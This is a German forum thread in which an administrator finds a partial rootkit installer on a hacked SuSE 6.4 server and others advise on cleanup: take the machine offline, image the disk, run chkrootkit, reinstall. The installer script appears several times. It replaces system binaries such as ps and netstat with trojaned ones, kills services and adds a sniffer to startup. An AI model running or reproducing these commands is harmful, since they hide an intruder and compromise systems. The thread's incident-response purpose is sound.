hallo zusammen,
heute morgen erwartete mich mein putty ssh mit einer überraschung: der "Finger print" unserer maschine (suse linux 6.4) war verändert und es erschien beim einloggen "no mail", was schon nach der qmail einführung auf der maschine nicht mehr läuft ;-(
jedenfalls hab ich dann auch noch ein verzeichnis rk mit einem seltsamen script entdeckt:


clear
echo
echo "Instalarea a inceput aveti rabdare...."
echo
echo
echo "Inlocuim netstat, ps, ifconfig, top... "
echo
echo

USERID=`id -u`
echo "--- Instalarea se face in ROOT mode?"
if [ $USERID -eq 0 ]
then
echo "+++ Da , putem continua"
else
echo "+++ Nope, instalarea se face in shell $USERID"
echo "Asta ii un ROOTKIT dobitocule si trebuie sa aiba uid=0"
exit
fi
chown root.root *

cp /usr/bin/crontab /usr/bin/ct
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
rm -rf /usr/sbin/tcpd
mv tcpd /usr/sbin/tcpd

killall -9 in.rexedcs
killall -9 defauths dcs
killall -9 defauths
killall -9 lpd
killall -9 rpc.statd
killall -9 portmap
killall -9 psybnc

usw.




echo -n "---Sniffer a fost pornit cu success---"
echo
echo "/usr/bin/sourcemask" >>/etc/rc.d/rc.sysinit
echo


echo
echo "Rootkit installed - made in Romania (str8hack) - (Catza)"
echo -n "-----------------------------------------------------------------------------------------
echo
echo



wurden wir gehackt? und was kann ich in der eile tun ?

gruss thomas hallo zusammen,
heute morgen erwartete mich mein putty ssh mit einer überraschung: der "Finger print" unserer maschine (suse linux 6.4) war verändert und es erschien beim einloggen "no mail", was schon nach der qmail einführung auf der maschine nicht mehr läuft ;-(
jedenfalls hab ich dann auch noch ein verzeichnis rk mit einem seltsamen script entdeckt:


clear
echo
echo "Instalarea a inceput aveti rabdare...."
echo
echo
echo "Inlocuim netstat, ps, ifconfig, top... "
echo
echo

USERID=`id -u`
echo "--- Instalarea se face in ROOT mode?"
if [ $USERID -eq 0 ]
then
echo "+++ Da , putem continua"
else
echo "+++ Nope, instalarea se face in shell $USERID"
echo "Asta ii un ROOTKIT dobitocule si trebuie sa aiba uid=0"
exit
fi
chown root.root *

cp /usr/bin/crontab /usr/bin/ct
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
rm -rf /usr/sbin/tcpd
mv tcpd /usr/sbin/tcpd

killall -9 in.rexedcs
killall -9 defauths dcs
killall -9 defauths
killall -9 lpd
killall -9 rpc.statd
killall -9 portmap
killall -9 psybnc

usw.




echo -n "---Sniffer a fost pornit cu success---"
echo
echo "/usr/bin/sourcemask" >>/etc/rc.d/rc.sysinit
echo


echo
echo "Rootkit installed - made in Romania (str8hack) - (Catza)"
echo -n "-----------------------------------------------------------------------------------------
echo
echo



wurden wir gehackt? und was kann ich in der eile tun ?

gruss thomas

Sieht wohl so aus, das euer server gehackt wurde ... wenn schon so ein script zu finden ist ...

Das einzige was bleibt, sofort vom netz nehmen und mit entsprechenden tools nach offenen türen suchen ... wenn du ganz sicher gehen willst ... neu installieren.

am besten, du installierst dir das 'chrootkit' das prüft auf backdoors und trojaner.
läuft bei uns in der firma auch.

hallo,
nun haben wir einigermassen feststellen können, was das script so macht:
es löscht zunächst mal folgende dateien:
ifconfig
netstat
ps
top
tcpd

und ersetzt diese durch seine eigenen. bei allen konnte ich die unsprüngliche version wieder herstellen, nur bei der netstat macht das system zu und sagt mir ich hätte keine berechtigung... chown und chmod halfen leider nicht, es erscheint immer noch die fehlermeldung bei jeglichem versuch die datei zu löschen...

gruss thomas

welche distibution nutzt du denn?
vielleicht kannst du ja das original packet einspielen?

suse 6.4...

Moin,
hier ist ein Link für dich vielleicht hilft der dir weiter:
http://security.alldas.de/analysis/?aid=2

Greeting Zaphod-B

soweit so gut,
allerdings bekomm ich die folgenden (vom wurm reinkopierten dateien) nicht gelöscht:
etc/rx.sysinit
usr/lib/identd
bin/netstat
bin/ps

ich kann die dateien als root nicht manipulieren.
was kann ich da tun???

Du löscht sie mit debug2fs.

Ist ja irgendwie ein wenig schlampig, das Verzeichnis mit dem Skript nicht zu löschen, oder?

Und den Prompt zu verändern ist auch nicht so clever... Glück gehabt würde ich sagen...

Original geschrieben von Buck76

clear
echo
echo "Instalarea a inceput aveti rabdare...."
echo
echo
echo "Inlocuim netstat, ps, ifconfig, top... "
echo
echo

USERID=`id -u`
echo "--- Instalarea se face in ROOT mode?"
if [ $USERID -eq 0 ]
then
echo "+++ Da , putem continua"
else
echo "+++ Nope, instalarea se face in shell $USERID"
echo "Asta ii un ROOTKIT dobitocule si trebuie sa aiba uid=0"
exit
fi
chown root.root *

cp /usr/bin/crontab /usr/bin/ct
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
rm -rf /usr/sbin/tcpd
mv tcpd /usr/sbin/tcpd

killall -9 in.rexedcs
killall -9 defauths dcs
killall -9 defauths
killall -9 lpd
killall -9 rpc.statd
killall -9 portmap
killall -9 psybnc



Klar und deutlich sieht man das es die Alten dateien loescht und durch neue (die mit hintertueren versehen sind) ersetzt.






echo -n "---Sniffer a fost pornit cu success---"
echo
echo "/usr/bin/sourcemask" >>/etc/rc.d/rc.sysinit
echo


echo
echo "Rootkit installed - made in Romania (str8hack) - (Catza)"
echo -n "-----------------------------------------------------------------------------------------
echo
echo


Erfolgsnachricht fuer das scriptkiddie, es sieht aus als waere es schon vorgekaut.


wurden wir gehackt? und was kann ich in der eile tun ?

ja.

Schaue dich oefters nach Security Updates um, du bist eigentlich fast selber schuld

@TheDodger
Kiste von Netz nehmen 100%, aber nicht vergessen ein komplettes image der Festplatte zu erzeugen. (logs&co)

mfg,
Air

[/nachtrag]
Am besten das System ganz neu aufsetzten, man weiß ja nie ...
[nachtrag]